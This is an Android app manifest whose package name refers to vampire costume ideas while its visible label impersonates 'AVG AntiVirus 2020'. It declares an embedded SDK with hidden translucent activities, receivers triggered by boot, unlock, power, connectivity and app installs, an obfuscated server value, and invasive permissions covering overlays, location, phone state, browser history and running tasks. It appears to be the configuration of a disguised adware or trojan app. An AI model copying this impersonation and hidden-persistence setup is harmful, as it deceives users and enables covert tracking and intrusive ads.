<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="602" android:versionName="6.1" android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" package="com.karriestudio.cooldiyvampirecostumeideas" platformBuildVersionCode="22" platformBuildVersionName="5.1.1-1819727">
    <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="22"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-feature android:name="android.hardware.location.gps" android:required="false"/>
    <uses-feature android:name="android.hardware.location" android:required="false"/>
    <uses-feature android:name="android.hardware.touchscreen" android:required="false"/>
    <application android:label="AVG AntiVirus 2020 for Android Security FREE" android:icon="@mipmap/ic_launcher" android:name="com.fastnet.browseralam.activity.BrowserApp" android:allowBackup="true" android:hardwareAccelerated="true">
        <activity android:theme="@style/Theme.Material.Light.NoActionBar.Fullscreen" android:label="AVG AntiVirus 2020 for Android Security FREE" android:name="com.jobstrak.drawingfun.sdk.activity.StartActivity" android:launchMode="singleTask" android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:alwaysRetainTaskState="true" android:windowSoftInputMode="adjustNothing">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.LAUNCHER"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <category android:name="android.intent.category.APP_BROWSER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="file"/>
                <data android:mimeType="text/html"/>
                <data android:mimeType="text/plain"/>
                <data android:mimeType="application/xhtml+xml"/>
                <data android:mimeType="application/vnd.wap.xhtml+xml"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="http"/>
                <data android:scheme="https"/>
                <data android:scheme="about"/>
                <data android:scheme="javascript"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="http"/>
                <data android:scheme="https"/>
                <data android:scheme="inline"/>
                <data android:mimeType="text/html"/>
                <data android:mimeType="text/plain"/>
                <data android:mimeType="application/xhtml+xml"/>
                <data android:mimeType="application/vnd.wap.xhtml+xml"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="http"/>
                <data android:scheme="https"/>
                <data android:scheme="file"/>
                <data android:mimeType="application/x-webarchive-xml"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.WEB_SEARCH"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings" android:name="com.fastnet.browseralam.settings.SettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings_general" android:name="com.fastnet.browseralam.settings.GeneralSettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.GENERAL_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings_display" android:name="com.fastnet.browseralam.settings.DisplaySettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.DISPLAY_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings_privacy" android:name="com.fastnet.browseralam.settings.PrivacySettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.PRIVACY_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings_advanced" android:name="com.fastnet.browseralam.settings.AdvancedSettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.ADVANCED_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/settings_about" android:name="com.fastnet.browseralam.settings.AboutSettingsActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.ABOUT_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/licenses" android:name="com.fastnet.browseralam.activity.LicenseActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.LICENSE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:theme="@style/Theme.SettingsTheme" android:label="@string/reading_mode" android:name="com.fastnet.browseralam.activity.ReadingActivity" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
            <intent-filter>
                <action android:name="android.intent.action.READING"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <service android:name="com.fastnet.browseralam.window.SpeedWindow" android:stopWithTask="true"/>
        <meta-data android:name="com.android.vending.derived.apk.id" android:value="1"/>
        <meta-data android:name="com.google.android.gms.version" android:value="12451000"/>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.sdk.activity.BannerActivity" android:taskAffinity="" android:excludeFromRecents="true"/>
        <activity android:name="com.jobstrak.drawingfun.sdk.activity.PermissionsActivity"/>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.BootReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
                <action android:name="android.intent.action.TIMEZONE_CHANGED"/>
                <action android:name="android.intent.action.TIME_SET"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.sdk.activity.TestageActivity" android:taskAffinity="" android:excludeFromRecents="true"/>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.sdk.activity.LinkActivity" android:taskAffinity="" android:excludeFromRecents="true" android:noHistory="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
        <service android:name="com.yandex.metrica.ConfigurationService" android:enabled="true" android:exported="false" android:process=":Metrica">
            <meta-data android:name="metrica:configuration:api:level" android:value="3"/>
            <intent-filter>
                <action android:name="com.yandex.metrica.configuration.ACTION_INIT"/>
            </intent-filter>
        </service>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.SDCardMountedReceiver" android:enabled="true">
            <intent-filter>
                <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
            </intent-filter>
        </receiver>
        <service android:name="com.yandex.metrica.MetricaService" android:enabled="true" android:exported="true" android:process=":Metrica">
            <intent-filter>
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="com.yandex.metrica.IMetricaService"/>
                <data android:scheme="metrica"/>
            </intent-filter>
            <meta-data android:name="metrica:api:level" android:value="81"/>
        </service>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.sdk.activity.BackstageActivity2" android:taskAffinity="" android:excludeFromRecents="true" android:launchMode="singleInstance"/>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.AppUpdatedReceiver" android:enabled="true">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <service android:name="com.yandex.metrica.ConfigurationJobService" android:permission="android.permission.BIND_JOB_SERVICE" android:enabled="true" android:exported="false" android:process=":Metrica"/>
        <service android:name="com.jobstrak.drawingfun.sdk.BackupService" android:enabled="true"/>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.lib.mopub.mobileads.MraidActivity" android:taskAffinity="" android:excludeFromRecents="true" android:launchMode="singleInstance"/>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.StartReceiver" android:enabled="true">
            <intent-filter>
                <action android:name="com.jobstrak.drawingfun.sdk.intent.action.START"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.UnlockReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.jobstrak.drawingfun.sdk.receiver.InstallsReceiver" android:enabled="true">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.yandex.metrica.MetricaEventHandler" android:enabled="true" android:exported="true">
            <intent-filter>
                <action android:name="com.android.vending.INSTALL_REFERRER"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.jobstrak.drawingfun.sdk.AlarmBroadcastReceiver" android:enabled="true"/>
        <activity android:theme="@style/Theme.Translucent.NoTitleBar" android:name="com.jobstrak.drawingfun.sdk.activity.WebActivity" android:taskAffinity="" android:excludeFromRecents="true" android:noHistory="true"/>
        <service android:name="com.jobstrak.drawingfun.sdk.JobService" android:permission="android.permission.BIND_JOB_SERVICE" android:enabled="true"/>
        <meta-data android:name="com.jobstrak.drawingfun.sdk.APP_ID" android:value="44ad3491-d997-4b5d-acbb-c1f406211809"/>
        <meta-data android:name="com.jobstrak.drawingfun.sdk.SERVER" android:value="EhUbWAcbLRoGAD5FHQAJ"/>
        <meta-data android:name="com.jobstrak.drawingfun.sdk.DEBUG" android:value="false"/>
    </application>
    <uses-permission android:name="android.permission.QUICKBOOT_POWERON"/>
    <uses-permission android:name="com.samsung.android.providers.context.permission.WRITE_USE_APP_FEATURE_SURVEY"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <supports-screens android:name="" android:anyDensity="true" android:smallScreens="true" android:normalScreens="true" android:largeScreens="true" android:resizeable="true" android:xlargeScreens="true"/>
</manifest>
